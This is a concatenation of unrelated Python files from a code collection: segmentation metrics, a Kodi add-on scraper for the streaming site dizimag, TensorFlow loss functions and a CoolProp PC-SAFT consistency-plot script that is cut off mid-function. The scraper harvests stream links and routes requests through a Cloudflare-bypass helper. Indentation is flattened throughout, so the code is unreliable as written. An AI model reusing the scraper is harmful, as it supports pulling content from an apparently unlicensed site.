def get_statistics(pred, gt, num_cls=2):
"""
return tp, fp, fn
"""
h,w = gt.shape
statistics = []
for i in range(num_cls):
tp = np.sum((pred==i)&(gt==i))
fp = np.sum((pred==i)&(gt!=i))
fn = np.sum((pred!=i)&(gt==i))
statistics.append([tp, fp, fn])
return statistics
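# --- Illustrative usage sketch (not part of the original file). The arrays below are
# synthetic 0/255 masks standing in for loaded prediction and ground-truth images.
if __name__ == "__main__":
    gt = np.zeros((8, 8), dtype=np.uint8)
    gt[2:6, 2:6] = 255                       # a small square foreground region
    pred = gt.astype(np.float64)             # a perfect prediction, scaled like an image
    metrics = cal_semantic_metrics([pred], [gt], thresh_step=0.5)
    for thresh, global_acc, mean_acc, mean_iou in metrics:
        print(thresh, global_acc, mean_acc, mean_iou)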
|
plugin.video.fanfilm/resources/lib/sources/disabled/dizimag_tv.py | mrknow/filmkodi | 105 | 12690393 | # -*- coding: utf-8 -*-
'''
FanFilm Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.libraries import cleantitle
from resources.lib.libraries import client
from resources.lib.libraries import cache
from resources.lib.libraries import control
from resources.lib.libraries import cloudflare
class source:
def __init__(self):
self.base_link = 'http://dizimag.co'
self.headers = {'X-Requested-With' : 'XMLHttpRequest'}
def dizimag_shows(self):
try:
result = cloudflare.source(self.base_link)
result = client.parseDOM(result, 'div', attrs = {'id': 'fil'})[0]
result = zip(client.parseDOM(result, 'a', ret='href'), client.parseDOM(result, 'a'))
result = [(re.sub('http.+?//.+?/','/', i[0]), cleantitle.tv(i[1])) for i in result]
return result
except:
return
def get_show(self, imdb, tvdb, tvshowtitle, year):
try:
result = cache.get(self.dizimag_shows, 72)
tvshowtitle = cleantitle.tv(tvshowtitle)
result = [i[0] for i in result if tvshowtitle == i[1]][0]
try: url = re.compile('//.+?(/.+)').findall(result)[0]
except: url = result
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def get_episode(self, url, imdb, tvdb, title, date, season, episode):
try:
if url == None: return
url = urlparse.urljoin(self.base_link, url)
result = client.source(url)
result = client.parseDOM(result, 'a', ret='href')
result = [i for i in result if '/%01d-sezon-%01d-bolum-' % (int(season), int(episode)) in i][0]
try: url = re.compile('//.+?(/.+)').findall(result)[0]
except: url = result
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def get_sources(self, url, hosthdDict, hostDict, locDict):
try:
sources = []
if url == None: return sources
sources_url = urlparse.urljoin(self.base_link, url)
result = client.request(sources_url, close=False)
result = re.compile('<script[^>]*>(.*?)</script>', re.DOTALL).findall(result)
result = [re.compile("var\s+kaynaklar.*?url\s*:\s*\"([^\"]+)\"\s*,\s*data\s*:\s*'([^']+)").findall(i.replace('\n', '')) for i in result]
result = [i[0] for i in result if len(i) > 0][0]
url = urlparse.urljoin(self.base_link, result[0])
post = result[1]
result = client.request(url, post=post, headers=self.headers)
result = re.compile('"videolink\d*"\s*:\s*"([^"]+)","videokalite\d*"\s*:\s*"?(\d+)p?').findall(result)
result = [(i[0].replace('\\/', '/'), i[1]) for i in result]
try:
url = [i for i in result if not 'google' in i[0]]
url = [('%s|User-Agent=%s&Referer=%s' % (i[0].decode('unicode_escape'), urllib.quote_plus(client.agent()), urllib.quote_plus(sources_url)), i[1]) for i in url]
try: sources.append({'source': 'Dizimag', 'quality': '1080p', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '1080'][0]})
except: pass
try: sources.append({'source': 'Dizimag', 'quality': 'HD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '720'][0]})
except: pass
try: sources.append({'source': 'Dizimag', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '480'][0]})
except: sources.append({'source': 'Dizimag', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '360'][0]})
except:
pass
try:
url = [i for i in result if 'google' in i[0]]
try: sources.append({'source': 'GVideo', 'quality': '1080p', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '1080'][0]})
except: pass
try: sources.append({'source': 'GVideo', 'quality': 'HD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '720'][0]})
except: pass
try: sources.append({'source': 'GVideo', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '480'][0]})
except: sources.append({'source': 'GVideo', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '360'][0]})
except:
pass
return sources
except:
return sources
def resolve(self, url):
try:
if not 'google' in url: return url
if url.startswith('stack://'): return url
url = client.request(url, output='geturl')
if 'requiressl=yes' in url: url = url.replace('http://', 'https://')
else: url = url.replace('https://', 'http://')
return url
except:
return
|
training/training_code/utils/Loss_functions.py | sergeyprokudin/HDNet_TikTok | 257 | 12690395 | <gh_stars>100-1000
import tensorflow as tf
# import tensorflow_graphics as tfg
import numpy as np
import skimage.data
from PIL import Image, ImageDraw, ImageFont
import math
from tensorflow.python.platform import gfile
import scipy.misc
IMAGE_HEIGHT = 256
IMAGE_WIDTH = 256
# *****************************************************************************************************
def calc_loss(output, y, z_r):
# y refine
y_masked = tf.where(z_r, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# output refine
o_masked = tf.where(z_r, output, 0*tf.ones_like(y))
o_masked_flat_refined = tf.reshape(o_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# mask refine
mask_one_refined = tf.where(z_r, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat_refined = tf.reshape(mask_one_refined,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# num of pixels
numOfPix = tf.reduce_sum(mask_one_flat_refined,1)
d = tf.subtract(o_masked_flat_refined, y_masked_flat_refined)
d_sum = tf.reduce_sum(tf.square(d),1)
cost = tf.reduce_mean(tf.truediv(d_sum, numOfPix))
return cost
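# --- Illustrative NumPy sketch (not part of the training code) of what calc_loss computes:
# a mean-squared error restricted to the pixels selected by the boolean mask z_r, averaged
# per image over the number of valid pixels and then over the batch. Shapes are assumed to
# be (batch, height, width).
def calc_loss_numpy(output, y, z_r):
    diff = np.where(z_r, output - y, 0.0)                       # zero out invalid pixels
    sq_sum = np.sum(diff.reshape(diff.shape[0], -1) ** 2, 1)    # per-image sum of squared errors
    num_pix = np.sum(z_r.reshape(z_r.shape[0], -1), 1)          # valid-pixel count per image
    return float(np.mean(sq_sum / num_pix))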
# *****************************************************************************************************
def calc_loss_normal(output, y_normal,z_refined):
# gives mean angle error for given output tensor and its ref y
output_mask = tf.abs(output) < 1e-5
output_no0 = tf.where(output_mask, 1e-5*tf.ones_like(output), output)
output_mag = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.square(output_no0),3)),-1)
output_unit = tf.divide(output_no0,output_mag)
z_mask = z_refined[...,0]
a11 = tf.boolean_mask(tf.reduce_sum(tf.square(output_unit),3),z_mask)
a22 = tf.boolean_mask(tf.reduce_sum(tf.square(y_normal),3),z_mask)
a12 = tf.boolean_mask(tf.reduce_sum(tf.multiply(output_unit,y_normal),3),z_mask)
cos_angle = a12/tf.sqrt(tf.multiply(a11,a22))
cos_angle_clipped = tf.clip_by_value(tf.where(tf.is_nan(cos_angle),-1*tf.ones_like(cos_angle),cos_angle),-1,1)
# MAE: tf.acos() is numerically unstable, so use a Taylor expansion of acos instead
loss = tf.reduce_mean(3.1415926/2-cos_angle_clipped-tf.pow(cos_angle_clipped,3)/6-tf.pow(cos_angle_clipped,5)*3/40-tf.pow(cos_angle_clipped,7)*5/112-tf.pow(cos_angle_clipped,9)*35/1152)
return loss
def calc_loss_normal2(output, y_normal,z_refined):
# gives mean angle error for given output tensor and its ref y
output_mask = tf.abs(output) < 1e-5
output_no0 = tf.where(output_mask, 1e-5*tf.ones_like(output), output)
output_mag = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.square(output_no0),3)),-1)
output_unit = tf.divide(output_no0,output_mag)
z_mask = z_refined[...,0]
a11 = tf.boolean_mask(tf.reduce_sum(tf.square(output_unit),3),z_mask)
a22 = tf.boolean_mask(tf.reduce_sum(tf.square(y_normal),3),z_mask)
a12 = tf.boolean_mask(tf.reduce_sum(tf.multiply(output_unit,y_normal),3),z_mask)
cos_angle = a12/(a11+0.00001)
loss = tf.reduce_mean(tf.acos(cos_angle))
return loss
# *****************************************************************************************************
def calc_loss_d_refined_mask(output, y, z_refined):
multiply = tf.constant([IMAGE_HEIGHT*IMAGE_WIDTH])
# mask nonrefine
mask_one = tf.where(z_refined, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat = tf.reshape(mask_one,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# y refine
y_masked = tf.where(z_refined, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
max_y = tf.reduce_max(y_masked_flat_refined,1)
matrix_max_y = tf.transpose(tf.reshape(tf.tile(max_y, multiply), [ multiply[0], tf.shape(max_y)[0]]))
# normalize depth
output_flat = tf.reshape(output,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
output_flat_masked = tf.multiply(output_flat, mask_one_flat)
output_max = tf.reduce_max(output_flat_masked,1)
matrix_max = tf.transpose(tf.reshape(tf.tile(output_max, multiply), [ multiply[0], tf.shape(output_max)[0]]))
output_min = tf.reduce_min(output_flat_masked,1)
matrix_min = tf.transpose(tf.reshape(tf.tile(output_min, multiply), [ multiply[0], tf.shape(output_min)[0]]))
output_unit_flat = tf.truediv(tf.subtract(output_flat_masked,matrix_min),tf.subtract(matrix_max,matrix_min))
output_unit_flat = tf.multiply(output_unit_flat,matrix_max_y)
# mask refine
mask_one_refined = tf.where(z_refined, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat_refined = tf.reshape(mask_one_refined,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# output refine
output_unit_masked_flat_refined = tf.multiply(output_unit_flat, mask_one_flat_refined)
# y refine
y_masked = tf.where(z_refined, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
numOfPix = tf.reduce_sum(mask_one_flat_refined,1)
d = tf.subtract(output_unit_masked_flat_refined, y_masked_flat_refined)
a1 = tf.reduce_sum(tf.square(d),1)
a2 = tf.square(tf.reduce_sum(d,1))
cost = tf.reduce_mean(tf.truediv(a1, numOfPix) - (0.5 * tf.truediv(a2, tf.square(numOfPix))))
return cost
|
wrappers/Python/CoolProp/Plots/ConsistencyPlots_pcsaft.py | pauliacomi/CoolProp | 520 | 12690404 | <reponame>pauliacomi/CoolProp<gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import matplotlib.pyplot as plt
import numpy as np
import time, timeit
import six
import pandas
import CoolProp as CP
from math import ceil
CP.CoolProp.set_debug_level(00)
from matplotlib.backends.backend_pdf import PdfPages
# all_solvers = ['PT', 'DmolarT', 'HmolarP', 'PSmolar', 'SmolarT', 'DmolarP', 'DmolarHmolar', 'DmolarSmolar', 'HmolarSmolar', 'HmolarT']
# not_implemented_solvers = ['HmolarP', 'PSmolar', 'SmolarT', 'DmolarP', 'DmolarHmolar', 'DmolarSmolar', 'HmolarSmolar', 'HmolarT']
all_solvers = ['PT', 'DmolarT']
not_implemented_solvers = []
no_two_phase_solvers = ['PT']
implemented_solvers = [pair for pair in all_solvers if pair not in not_implemented_solvers]
param_labels = dict(Hmolar='Enthalpy [J/mol]/1000',
Smolar='Entropy [J/mol/K]/1000',
Umolar='Int. Ener. [J/mol]/1000',
T='Temperature [K]',
Dmolar='Density [mol/m3]/1000',
P='Pressure [Pa]/1000')
def split_pair(pair):
for key in ['Dmolar', 'Hmolar', 'Smolar', 'P', 'T', 'Umolar']:
if pair.startswith(key):
return key, pair.replace(key, '')
def split_pair_xy(pair):
if pair == 'HmolarP':
return 'Hmolar', 'P'
elif pair == 'PSmolar':
return 'Smolar', 'P'
elif pair == 'PUmolar':
return 'Umolar', 'P'
elif pair == 'PT':
return 'T', 'P'
elif pair == 'DmolarT':
return 'Dmolar', 'T'
elif pair == 'SmolarT':
return 'Smolar', 'T'
elif pair == 'TUmolar':
return 'Umolar', 'T'
elif pair == 'HmolarT':
return 'Hmolar', 'T'
elif pair == 'DmolarP':
return 'Dmolar', 'P'
elif pair == 'DmolarHmolar':
return 'Dmolar', 'Hmolar'
elif pair == 'DmolarSmolar':
return 'Dmolar', 'Smolar'
elif pair == 'DmolarUmolar':
return 'Dmolar', 'Umolar'
elif pair == 'HmolarSmolar':
return 'Smolar', 'Hmolar'
elif pair == 'SmolarUmolar':
return 'Smolar', 'Umolar'
elif pair == 'HmolarUmolar':
return 'Hmolar', 'Umolar'
else:
raise ValueError(pair)
DEBUG_LEVEL = 1
def myprint(level, *args, **kwargs):
if level > DEBUG_LEVEL:
print(*args, **kwargs)
class ConsistencyFigure(object):
def __init__(self, fluid, figsize=(15, 23), backend='PCSAFT', additional_skips=[], mole_fractions=None, p_limits_1phase=None, T_limits_1phase=None, NT_1phase=40, Np_1phase=40, NT_2phase=20, NQ_2phase=20):
self.fluid = fluid
self.backend = backend
self.additional_backend = 'HEOS' # the PCSAFT backend does not currently have all the constants and functions for calculating the boundaries of the phase diagram
print('***********************************************************************************')
print('*************** ' + backend + '::' + fluid + ' ************************')
print('***********************************************************************************')
self.fig, self.axes = plt.subplots(nrows=ceil(len(all_solvers)/2), ncols=2, figsize=figsize)
self.pairs = all_solvers
pairs_generator = iter(self.pairs)
states = [CP.AbstractState(self.additional_backend, fluid) for _ in range(3)]
states_pcsaft = [CP.AbstractState(backend, fluid) for _ in range(3)]
if mole_fractions is not None:
for state in states:
state.set_mole_fractions(mole_fractions)
for state in states_pcsaft:
state.set_mole_fractions(mole_fractions)
self.axes_list = []
if len(self.axes.shape) > 1:
for row in self.axes:
for ax in row:
pair = six.next(pairs_generator)
kwargs = dict(p_limits_1phase=p_limits_1phase, T_limits_1phase=T_limits_1phase, NT_1phase=NT_1phase, Np_1phase=Np_1phase,
NT_2phase=NT_2phase, NQ_2phase=NQ_2phase)
self.axes_list.append(ConsistencyAxis(ax, self, pair, self.fluid, self.backend, self.additional_backend, *states, *states_pcsaft, **kwargs))
ax.set_title(pair)
else:
for ax in self.axes:
pair = six.next(pairs_generator)
kwargs = dict(p_limits_1phase=p_limits_1phase, T_limits_1phase=T_limits_1phase, NT_1phase=NT_1phase, Np_1phase=Np_1phase,
NT_2phase=NT_2phase, NQ_2phase=NQ_2phase)
self.axes_list.append(ConsistencyAxis(ax, self, pair, self.fluid, self.backend, self.additional_backend, *states, *states_pcsaft, **kwargs))
ax.set_title(pair)
self.calc_saturation_curves()
self.plot_saturation_curves()
# self.calc_Tmax_curve()
# self.plot_Tmax_curve()
#
# self.calc_melting_curve()
# self.plot_melting_curve()
self.tight_layout()
self.fig.subplots_adjust(top=0.95)
self.fig.suptitle('Consistency plots for ' + self.fluid, size=14)
errors = []
for i, (ax, pair) in enumerate(zip(self.axes_list, self.pairs)):
if pair not in not_implemented_solvers and pair not in additional_skips:
errors.append(ax.consistency_check_singlephase())
if pair not in no_two_phase_solvers:
ax.consistency_check_twophase()
else:
ax.cross_out_axis()
self.errors = pandas.concat(errors, sort=True)
def calc_saturation_curves(self):
"""
Calculate all the saturation curves in one shot using the state class to save computational time
"""
HEOS = CP.AbstractState(self.additional_backend, self.fluid)
PCSAFT = CP.AbstractState(self.backend, self.fluid)
self.dictL, self.dictV = {}, {}
for Q, dic in zip([0, 1], [self.dictL, self.dictV]):
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
for _T in np.logspace(np.log10(HEOS.keyed_output(CP.iT_triple)), np.log10(HEOS.keyed_output(CP.iT_critical)), 500):
try:
PCSAFT.update(CP.QT_INPUTS, Q, _T)
# print('T', PCSAFT.T())
# print('p', PCSAFT.p())
# print('rhomolar', PCSAFT.rhomolar())
if (PCSAFT.p() < 0): raise ValueError('P is negative:' + str(PCSAFT.p()))
PCSAFT.T(), PCSAFT.p(), PCSAFT.rhomolar()
# PCSAFT.hmolar(), PCSAFT.smolar(), PCSAFT.umolar()
T.append(PCSAFT.T())
p.append(PCSAFT.p())
rhomolar.append(PCSAFT.rhomolar())
# hmolar.append(PCSAFT.hmolar())
# smolar.append(PCSAFT.smolar())
# umolar.append(PCSAFT.umolar())
except ValueError as VE:
myprint(1, 'satT error:', VE, '; T:', '{T:0.16g}'.format(T=_T), 'T/Tc:', _T / HEOS.keyed_output(CP.iT_critical))
dic.update(dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar)))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar)))
# Umolar=np.array(umolar)))
def plot_saturation_curves(self):
for ax in self.axes_list:
ax.label_axes()
ax.plot_saturation_curves()
def calc_Tmax_curve(self):
HEOS = CP.AbstractState(self.additional_backend, self.fluid)
PCSAFT = CP.AbstractState(self.backend, self.fluid)
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
for _p in np.logspace(np.log10(HEOS.keyed_output(CP.iP_min) * 1.01), np.log10(HEOS.keyed_output(CP.iP_max)), 300):
try:
PCSAFT.update(CP.PT_INPUTS, _p, HEOS.keyed_output(CP.iT_max))
except ValueError as VE:
print(1, 'Tmax', _p, VE)
print('T', PCSAFT.T())
print('p', PCSAFT.p())
print('rhomolar', PCSAFT.rhomolar())
myprint(1, 'Tmax', _p, VE)
continue
try:
T.append(PCSAFT.T())
p.append(PCSAFT.p())
rhomolar.append(PCSAFT.rhomolar())
# hmolar.append(PCSAFT.hmolar())
# smolar.append(PCSAFT.smolar())
# umolar.append(PCSAFT.umolar())
except ValueError as VE:
myprint(1, 'Tmax access', VE)
self.Tmax = dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar))
# Umolar=np.array(umolar))
def plot_Tmax_curve(self):
for ax in self.axes_list:
ax.plot_Tmax_curve()
def calc_melting_curve(self):
state = CP.AbstractState('HEOS', self.fluid)
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
# Melting line if it has it
if state.has_melting_line():
pmelt_min = max(state.melting_line(CP.iP_min, -1, -1), state.keyed_output(CP.iP_triple)) * 1.01
pmelt_max = min(state.melting_line(CP.iP_max, -1, -1), state.keyed_output(CP.iP_max)) * 0.99
for _p in np.logspace(np.log10(pmelt_min), np.log10(pmelt_max), 100):
try:
Tm = state.melting_line(CP.iT, CP.iP, _p)
state.update(CP.PT_INPUTS, _p, Tm)
T.append(state.T())
p.append(state.p())
rhomolar.append(state.rhomolar())
# hmolar.append(state.hmolar())
# smolar.append(state.smolar())
# umolar.append(state.umolar())
except ValueError as VE:
myprint(1, 'melting', VE)
self.melt = dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar))
# Umolar=np.array(umolar))
def plot_melting_curve(self):
for ax in self.axes_list:
ax.plot_melting_curve()
def tight_layout(self):
self.fig.tight_layout()
def add_to_pdf(self, pdf):
""" Add this figure to the pdf instance """
pdf.savefig(self.fig)
def savefig(self, fname, **kwargs):
self.fig.savefig(fname, **kwargs)
class ConsistencyAxis(object):
def __init__(self, axis, fig, pair, fluid, backend, additional_backend, state1, state2, state3,
state4, state5, state6, p_limits_1phase=None, T_limits_1phase=None, NT_1phase=40, Np_1phase=40,
NT_2phase=20, NQ_2phase=20
):
self.ax = axis
self.fig = fig
self.pair = pair
self.fluid = fluid
self.backend = backend
self.additional_backend = additional_backend
self.state = state1
self.state_PT = state2
self.state_QT = state3
self.state_pcsaft = state4
self.state_pcsaft_PT = state5
self.state_pcsaft_QT = state6
self.p_limits_1phase = p_limits_1phase
self.T_limits_1phase = T_limits_1phase
self.NT_1phase = NT_1phase
self.Np_1phase = Np_1phase
self.NQ_2phase = NQ_2phase
self.NT_2phase = NT_2phase
# self.saturation_curves()
def label_axes(self):
""" Label the axes for the given pair """
xparam, yparam = split_pair_xy(self.pair)
self.ax.set_xlabel(param_labels[xparam])
self.ax.set_ylabel(param_labels[yparam])
if xparam in ['P', 'Dmolar']:
self.ax.set_xscale('log')
if yparam in ['P', 'Dmolar']:
self.ax.set_yscale('log')
def plot_saturation_curves(self):
xparam, yparam = split_pair_xy(self.pair)
xL = self.to_axis_units(xparam, self.fig.dictL[xparam])
yL = self.to_axis_units(yparam, self.fig.dictL[yparam])
xV = self.to_axis_units(xparam, self.fig.dictV[xparam])
yV = self.to_axis_units(yparam, self.fig.dictV[yparam])
self.ax.plot(xL, yL, 'k', lw=1)
self.ax.plot(xV, yV, 'k', lw=1)
def plot_Tmax_curve(self):
xparam, yparam = split_pair_xy(self.pair)
x = self.to_axis_units(xparam, self.fig.Tmax[xparam])
y = self.to_axis_units(yparam, self.fig.Tmax[yparam])
self.ax.plot(x, y, 'r', lw=1) # !!! start here: ValueError: x and y must have same first dimension, but have shapes (0,) and (65,)
def plot_melting_curve(self):
xparam, yparam = split_pair_xy(self.pair)
x = self.to_axis_units(xparam, self.fig.melt[xparam])
y = self.to_axis_units(yparam, self.fig.melt[yparam])
self.ax.plot(x, y, 'b', lw=1)
def to_axis_units(self, label, vals):
""" Convert to the units used in the plot """
if label in ['Hmolar', 'Smolar', 'Umolar', 'Dmolar', 'P']:
return vals / 1000
elif label in ['T']:
return vals
else:
raise ValueError(label)
def consistency_check_singlephase(self):
tic = time.time()
# Update the state given the desired set of inputs
param1, param2 = split_pair(self.pair)
key1 = getattr(CP, 'i' + param1)
key2 = getattr(CP, 'i' + param2)
pairkey = getattr(CP, self.pair + '_INPUTS')
# Get the keys and indices and values for the inputs needed
xparam, yparam = split_pair_xy(self.pair)
xkey = getattr(CP, 'i' + xparam)
ykey = getattr(CP, 'i' + yparam)
data = []
if self.p_limits_1phase is not None:
# User-specified limits were provided, use them
p_min, p_max = self.p_limits_1phase
else:
# No user-specified limits were provided, use the defaults
p_min = self.state.keyed_output(CP.iP_min) * 1.01
p_max = self.state.keyed_output(CP.iP_max)
for p in np.logspace(np.log10(p_min), np.log10(p_max), self.Np_1phase):
if self.T_limits_1phase is None:
# No user-specified limits were provided, using the defaults
Tmin = self.state.keyed_output(CP.iT_triple)
if self.state.has_melting_line():
try:
pmelt_min = self.state.melting_line(CP.iP_min, -1, -1)
if p < pmelt_min:
T0 = Tmin
else:
T0 = self.state.melting_line(CP.iT, CP.iP, p)
except Exception as E:
T0 = Tmin + 1.1
data.append(dict(err=str(E), type="melting", input=p))
myprint(1, 'MeltingLine:', E)
else:
T0 = Tmin + 1.1
Tvec = np.linspace(T0, self.state.keyed_output(CP.iT_max), self.NT_1phase)
else:
# Use the provided limits for T
Tvec = np.linspace(self.T_limits_1phase[0], self.T_limits_1phase[1], self.NT_1phase)
for T in Tvec:
try:
# Update the state using PT inputs in order to calculate all the remaining inputs
self.state_pcsaft_PT.update(CP.PT_INPUTS, p, T)
except ValueError as VE:
print(self.state_pcsaft_PT.get_mole_fractions())
print(self.state_PT.get_mole_fractions())
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1="P", val1=p, in2="T", val2=T))
myprint(1, 'consistency', VE)
continue
_exception = False
tic2 = timeit.default_timer()
try:
val1, val2 = self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)
self.state_pcsaft.update(pairkey, val1, val2)
toc2 = timeit.default_timer()
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1=param1, val1=val1, in2=param2, val2=val2))
myprint(1, 'update(1p)', self.pair, 'P', p, 'T', T, 'D', self.state_pcsaft_PT.keyed_output(CP.iDmolar), '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), VE)
_exception = True
x = self.to_axis_units(xparam, self.state_pcsaft_PT.keyed_output(xkey))
y = self.to_axis_units(yparam, self.state_pcsaft_PT.keyed_output(ykey))
if not _exception:
# Check the error on the density
if abs(self.state_pcsaft_PT.rhomolar() / self.state_pcsaft.rhomolar() - 1) < 1e-3 and abs(self.state_pcsaft_PT.p() / self.state_pcsaft.p() - 1) < 1e-3 and abs(self.state_pcsaft_PT.T() - self.state_pcsaft.T()) < 1e-3:
data.append(dict(cls="GOOD", x=x, y=y, elapsed=toc2 - tic2))
if 'REFPROP' not in self.backend:
if self.state_pcsaft_PT.phase() != self.state_pcsaft.phase():
myprint(1, 'bad phase', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), self.state_pcsaft.phase(), 'instead of', self.state_pcsaft_PT.phase())
else:
data.append(dict(cls="INCONSISTENT", type="update", in1=param1, val1=val1, in2=param2, val2=val2, x=x, y=y))
myprint(1, 'bad', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), 'T:', self.state_pcsaft_PT.T(), 'Drho:', abs(self.state_pcsaft_PT.rhomolar() / self.state_pcsaft.rhomolar() - 1), abs(self.state_pcsaft_PT.p() / self.state_pcsaft.p() - 1), 'DT:', abs(self.state_pcsaft_PT.T() - self.state_pcsaft.T()))
toc = time.time()
df = pandas.DataFrame(data)
bad = df[df.cls == 'INCONSISTENT']
good = df[df.cls == 'GOOD']
slowgood = good[good.elapsed > 0.01]
excep = df[df.cls == 'EXCEPTION']
badphase = df[df.cls == 'BAD_PHASE']
self.ax.plot(bad.x, bad.y, 'r+', ms=3)
self.ax.plot(good.x, good.y, 'k.', ms=1)
self.ax.plot(excep.x, excep.y, 'rx', ms=3)
self.ax.plot(slowgood.x, slowgood.y, 'b*', ms=6)
self.ax.plot(badphase.x, badphase.y, 'o', ms=3, mfc='none')
print('1-phase took ' + str(toc - tic) + ' s for ' + self.pair)
if self.pair == 'HmolarSmolar':
# plt.plot(good.elapsed)
# plt.title(self.pair)
# plt.show()
good.to_csv('times_water', sep=';')
# good.to_excel('times_water.xlsx') # !!! uncomment
return df[df.cls != 'GOOD']
def consistency_check_twophase(self):
tic = time.time()
state = self.state
try:
if self.state_pcsaft.fluid_param_string('pure') == 'false':
print("Not a pure-fluid, skipping two-phase evaluation")
return
except:
pass
# Update the state given the desired set of inputs
param1, param2 = split_pair(self.pair)
key1 = getattr(CP, 'i' + param1)
key2 = getattr(CP, 'i' + param2)
pairkey = getattr(CP, self.pair + '_INPUTS')
# Get the keys and indices and values for the inputs needed
xparam, yparam = split_pair_xy(self.pair)
xkey = getattr(CP, 'i' + xparam)
ykey = getattr(CP, 'i' + yparam)
data = []
for q in np.linspace(0, 1, self.NQ_2phase):
Tmin = state.keyed_output(CP.iT_triple) + 1
for T in np.linspace(Tmin, state.keyed_output(CP.iT_critical) - 1, self.NT_2phase):
try:
# Update the state using QT inputs in order to calculate all the remaining inputs
self.state_pcsaft_QT.update(CP.QT_INPUTS, q, T)
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1="Q", val1=q, in2="T", val2=T))
myprint(1, 'consistency', VE)
continue
_exception = False
try:
val1, val2 = self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)
self.state_pcsaft.update(pairkey, val1, val2)
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1=param1, val1=val1, in2=param2, val2=val2))
myprint(1, 'update_QT', T, q)
myprint(1, 'update', param1, self.state_pcsaft_QT.keyed_output(key1), param2, self.state_pcsaft_QT.keyed_output(key2), VE)
_exception = True
x = self.to_axis_units(xparam, self.state_pcsaft_QT.keyed_output(xkey))
y = self.to_axis_units(yparam, self.state_pcsaft_QT.keyed_output(ykey))
if not _exception:
# Check the error on the density
if abs(self.state_pcsaft_QT.rhomolar() / self.state_pcsaft.rhomolar() - 1) < 1e-3 and abs(self.state_pcsaft_QT.p() / self.state_pcsaft.p() - 1) < 1e-3 and abs(self.state_pcsaft_QT.T() - self.state_pcsaft.T()) < 1e-3:
data.append(dict(cls="GOOD", x=x, y=y))
if 'REFPROP' not in self.backend:
if self.state_pcsaft_QT.phase() != self.state_pcsaft.phase():
myprint(1, 'bad phase (2phase)', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)), self.state_pcsaft.phase(), 'instead of', self.state_pcsaft_QT.phase())
else:
myprint(1, 'Q', q)
myprint(1, 'bad(2phase)', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)), 'pnew:', self.state_pcsaft.p(), 'pold:', self.state_pcsaft_QT.p(), 'Tnew:', self.state_pcsaft.T(), 'T:', self.state_pcsaft_QT.T(), 'Drho:', abs(self.state_pcsaft_QT.rhomolar() / self.state_pcsaft.rhomolar() - 1), 'DP', abs(self.state_pcsaft_QT.p() / self.state_pcsaft.p() - 1), 'DT:', abs(self.state_pcsaft_QT.T() - self.state_pcsaft.T()))
